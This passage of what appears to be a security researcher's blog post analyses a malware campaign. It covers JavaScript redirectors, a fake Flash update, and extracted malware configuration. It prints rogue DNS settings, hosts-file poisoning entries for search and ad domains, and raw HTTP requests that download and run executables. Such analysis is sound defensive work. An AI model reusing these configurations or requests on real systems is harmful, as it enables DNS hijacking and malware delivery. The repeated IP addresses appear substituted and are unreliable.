But after some more research I noticed that it was not just Sweden that was affected, it seemed to be a global epidemic. I also noticed that we were talking about two different redirectors; Trojan.JS.Redirector.ro and Trojan.JS.Pakes.cp.
In the next step, the victims are redirected to a server which validates the origin (country) of the victim. Depending on the location a malicious payload is executed. In one example that we have seen, users are redirected to a malicious website posing as a YouTube video, that tries to get the user to download an update to Flash Player, which is actually malware.
The technical setup is almost identical to the Lizamoon case we read about a few months back. Same filenames, same techniques and also the server setups looks very identical.
MALWARE ANALYSIS (ongoing!)
If the victim downloads and executes the fake flash update, it will upon execution connect back to the following servers:
- 184.108.40.206/?19= (Virtual Host: update.19runs10q3.com)
Upon execution the malware will modify the hosts file and “poison” known domains. It will make the infected computer use rogue DNS servers, and redirect the users to malicious websites. The following configuration file has been extracted from the malware:
[redirected_dns] -affiliate=9; -DnsServerIp=220.127.116.11; -DnsServerIp=18.104.22.168; -DnsServerIp=22.214.171.124; -FakeDnsServerIp=126.96.36.199; -FakeDnsServerIp=188.8.131.52; -FakeDnsServerIp=184.108.40.206; [redirect_timeouts] -response_timeout=40000; -redirect_deactivating_interval=40020; [reports] -Version=260; -host=220.127.116.11/chrome/report.html; -host_first=18.104.22.168/chrome/report.html; -check_timeout=10000; -disable_reports=0; [AntiRB] -server=22.214.171.124; [GUI] -long_start=0; [UAC] -DelayBeforeRun=10; [redirected_ips] [redirected_domains] -www.google.com.=126.96.36.199; -google.com.=188.8.131.52; -google.com.au.=184.108.40.206; -www.google.com.au.=220.127.116.11; -google.be.=18.104.22.168; -www.google.be.=22.214.171.124; -google.com.br.=126.96.36.199; -www.google.com.br.=188.8.131.52; -google.ca.=184.108.40.206; -www.google.ca.=220.127.116.11; -google.ch.=18.104.22.168; -www.google.ch.=22.214.171.124; -google.de.=126.96.36.199; -www.google.de.=188.8.131.52; -google.dk.=184.108.40.206; -www.google.dk.=220.127.116.11; -google.fr.=18.104.22.168; -www.google.fr.=22.214.171.124; -google.ie.=126.96.36.199; -www.google.ie.=188.8.131.52; -google.it.=184.108.40.206; -www.google.it.=220.127.116.11; -google.co.jp.=18.104.22.168; -www.google.co.jp.=22.214.171.124; -google.nl.=126.96.36.199; -www.google.nl.=188.8.131.52; -google.no.=184.108.40.206; -www.google.no.=220.127.116.11; -google.co.nz.=18.104.22.168; -www.google.co.nz.=22.214.171.124; -google.pl.=126.96.36.199; -www.google.pl.=188.8.131.52; -google.se.=184.108.40.206; -www.google.se.=220.127.116.11; -google.co.uk.=18.104.22.168; -www.google.co.uk.=22.214.171.124; -google.co.za.=126.96.36.199; -www.google.co.za.=188.8.131.52; -www.google-analytics.com.=184.108.40.206; -www.bing.com.=220.127.116.11; -search.yahoo.com.=18.104.22.168; -www.search.yahoo.com.=22.214.171.124; -uk.search.yahoo.com.=126.96.36.199; -ca.search.yahoo.com.=188.8.131.52; -de.search.yahoo.com.=184.108.40.206; -fr.search.yahoo.com.=220.127.116.11; -au.search.yahoo.com.=18.104.22.168; -ad-emea.doubleclick.net.=22.214.171.124; -www.statcounter.com.=126.96.36.199; [redirected_domains_hosts] -www.google-analytics.com.=188.8.131.52; -ad-emea.doubleclick.net.=184.108.40.206; -www.statcounter.com.=220.127.116.11;
The malware will then changes the DNS configuration by modifying the hosts file to poison the following hostnames:
- 18.104.22.168 www.google-analytics.com.
- 22.214.171.124 ad-emea.doubleclick.net.
- 126.96.36.199 www.statcounter.com.
Additional will the malware download and excecute updates. Some of the following requests have been collected:
v=spf1 a mx ip4:%d.%d.%d.%d/%d ?all /?controller=hash HTTP/1.1 Host: update1.randomstring.com User-Agent: IE7 /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3 HTTP/1.1 Host: update1.randomstring.com User-Agent: IE7 HTTP/1.1 /update_c1eec.exe Host: update1.randomstring.com User-Agent: IE7 /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3 HTTP/1.1 Host: update1.randomstring.com
We are also seeing a very high increase in Java, PDF and Flash exploits in the wild, but we are still unsure if this attack is also responsible for exploiting victims exposed to these vulnerabilities. But in all countries mentioned in the statistics, these exploits have dramatically increased in September and October. As soon as i have information i will publish it.
Leave a reply